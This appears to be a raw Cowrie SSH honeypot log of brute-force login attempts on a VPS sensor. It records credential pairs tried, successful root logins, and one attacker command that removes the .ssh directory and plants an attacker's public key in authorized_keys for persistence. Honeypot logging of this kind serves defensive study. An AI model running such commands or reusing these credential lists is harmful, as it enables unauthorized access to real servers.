{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:30:54.760473Z","src_ip":"212.227.235.229","session":"3b25932a4fc0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56858,"dst_ip":"1.2.3.4","dst_port":22,"session":"1fb418218c87","protocol":"ssh","message":"New connection: 212.227.235.229:56858 (1.2.3.4:22) [session: 1fb418218c87]","sensor":"my-vps","timestamp":"2025-08-31T00:30:57.307556Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:30:57.308257Z","src_ip":"212.227.235.229","session":"1fb418218c87"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:30:57.613441Z","src_ip":"212.227.235.229","session":"1fb418218c87"}
{"eventid":"cowrie.login.success","username":"root","password":"pass0000","message":"login attempt [root/pass0000] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:30:58.872001Z","src_ip":"212.227.235.229","session":"1fb418218c87"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:30:59.536551Z","src_ip":"212.227.235.229","session":"1fb418218c87"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T00:30:59.537221Z","src_ip":"212.227.235.229","session":"1fb418218c87"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T00:30:59.538093Z","src_ip":"212.227.235.229","session":"1fb418218c87"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:30:59.901877Z","src_ip":"212.227.235.229","session":"1fb418218c87"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T00:31:01.051281Z","src_ip":"212.227.235.229","session":"1fb418218c87"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T00:31:01.051994Z","src_ip":"212.227.235.229","session":"1fb418218c87"}
{"eventid":"cowrie.login.failed","username":"backup","password":"12345678","message":"login attempt [backup/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T00:31:01.054175Z","src_ip":"212.227.235.229","session":"3b25932a4fc0"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T00:31:01.358948Z","src_ip":"212.227.235.229","session":"1fb418218c87"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:31:01.359877Z","src_ip":"212.227.235.229","session":"1fb418218c87"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36758,"dst_ip":"1.2.3.4","dst_port":22,"session":"88679c5cc55c","protocol":"ssh","message":"New connection: 212.227.235.229:36758 (1.2.3.4:22) [session: 88679c5cc55c]","sensor":"my-vps","timestamp":"2025-08-31T00:31:01.655663Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:31:01.656810Z","src_ip":"212.227.235.229","session":"88679c5cc55c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:31:01.957975Z","src_ip":"212.227.235.229","session":"88679c5cc55c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T00:31:03.204664Z","src_ip":"212.227.235.229","session":"88679c5cc55c"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:31:03.942317Z","src_ip":"212.227.235.229","session":"3b25932a4fc0"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:31:04.508266Z","src_ip":"212.227.235.229","session":"88679c5cc55c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40940,"dst_ip":"1.2.3.4","dst_port":22,"session":"f4afd6769f83","protocol":"ssh","message":"New connection: 212.227.235.229:40940 (1.2.3.4:22) [session: f4afd6769f83]","sensor":"my-vps","timestamp":"2025-08-31T00:31:04.821269Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:31:04.821924Z","src_ip":"212.227.235.229","session":"f4afd6769f83"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:31:05.129023Z","src_ip":"212.227.235.229","session":"f4afd6769f83"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T00:31:06.394873Z","src_ip":"212.227.235.229","session":"f4afd6769f83"}
{"eventid":"cowrie.session.closed","duration":"9.4","message":"Connection lost after 9.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:31:06.697267Z","src_ip":"212.227.235.229","session":"1fb418218c87"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:31:06.701949Z","src_ip":"212.227.235.229","session":"f4afd6769f83"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38850,"dst_ip":"1.2.3.4","dst_port":22,"session":"320ee451bd94","protocol":"ssh","message":"New connection: 212.227.125.160:38850 (1.2.3.4:22) [session: 320ee451bd94]","sensor":"my-vps","timestamp":"2025-08-31T00:31:16.394044Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:31:16.966246Z","src_ip":"212.227.125.160","session":"320ee451bd94"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:31:16.967388Z","src_ip":"212.227.125.160","session":"320ee451bd94"}
{"eventid":"cowrie.login.failed","username":"backup","password":"12345678","message":"login attempt [backup/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T00:31:19.347375Z","src_ip":"212.227.125.160","session":"320ee451bd94"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:31:21.297479Z","src_ip":"212.227.125.160","session":"320ee451bd94"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38578,"dst_ip":"1.2.3.4","dst_port":22,"session":"c51e79e744d7","protocol":"ssh","message":"New connection: 212.227.235.229:38578 (1.2.3.4:22) [session: c51e79e744d7]","sensor":"my-vps","timestamp":"2025-08-31T00:31:55.552160Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T00:31:55.553209Z","src_ip":"212.227.235.229","session":"c51e79e744d7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T00:31:55.855974Z","src_ip":"212.227.235.229","session":"c51e79e744d7"}
{"eventid":"cowrie.login.failed","username":"useradmin","password":"useradmin123","message":"login attempt [useradmin/useradmin123] failed","sensor":"my-vps","timestamp":"2025-08-31T00:31:57.120376Z","src_ip":"212.227.235.229","session":"c51e79e744d7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60460,"dst_ip":"1.2.3.4","dst_port":22,"session":"052f41d01419","protocol":"ssh","message":"New connection: 212.227.235.229:60460 (1.2.3.4:22) [session: 052f41d01419]","sensor":"my-vps","timestamp":"2025-08-31T00:31:57.139519Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:31:57.949651Z","src_ip":"212.227.235.229","session":"052f41d01419"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:31:57.950310Z","src_ip":"212.227.235.229","session":"052f41d01419"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:31:58.424589Z","src_ip":"212.227.235.229","session":"c51e79e744d7"}
{"eventid":"cowrie.login.failed","username":"backup","password":"123456789","message":"login attempt [backup/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T00:32:04.136636Z","src_ip":"212.227.235.229","session":"052f41d01419"}
{"eventid":"cowrie.session.closed","duration":"9.0","message":"Connection lost after 9.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:32:06.142417Z","src_ip":"212.227.235.229","session":"052f41d01419"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":51702,"dst_ip":"1.2.3.4","dst_port":22,"session":"ca3e43c5f5dd","protocol":"ssh","message":"New connection: 212.227.125.160:51702 (1.2.3.4:22) [session: ca3e43c5f5dd]","sensor":"my-vps","timestamp":"2025-08-31T00:32:18.982613Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:32:19.881856Z","src_ip":"212.227.125.160","session":"ca3e43c5f5dd"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T00:32:19.883142Z","src_ip":"212.227.125.160","session":"ca3e43c5f5dd"}
{"eventid":"cowrie.login.failed","username":"backup","password":"123456789","message":"login attempt [backup/123456789] failed","sensor":"my-vps","timestamp":"2025-08-31T00:32:22.643696Z","src_ip":"212.227.125.160","session":"ca3e43c5f5dd"}
{"eventid":"cowrie.session.closed","duration":"4.8","message":"Connection lost after 4.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T00:32:23.751398Z","src_ip":"212.227.125.160","session":"ca3e43c5f5dd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54960,"dst_ip":"1.2.3.4","dst_port":22,"session":"7e2282187dc3","protocol":"ssh","message":"New connection: 212.227.235.229:54960 (1.2.3.4:22) [session: 7e2282187dc3]","sensor":"my-vps","timestamp":"2025-08-31T00:32:26.246270Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T00:32:26.247288Z","src_ip":"212.227.235.229","session":"7e2282187dc3"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcf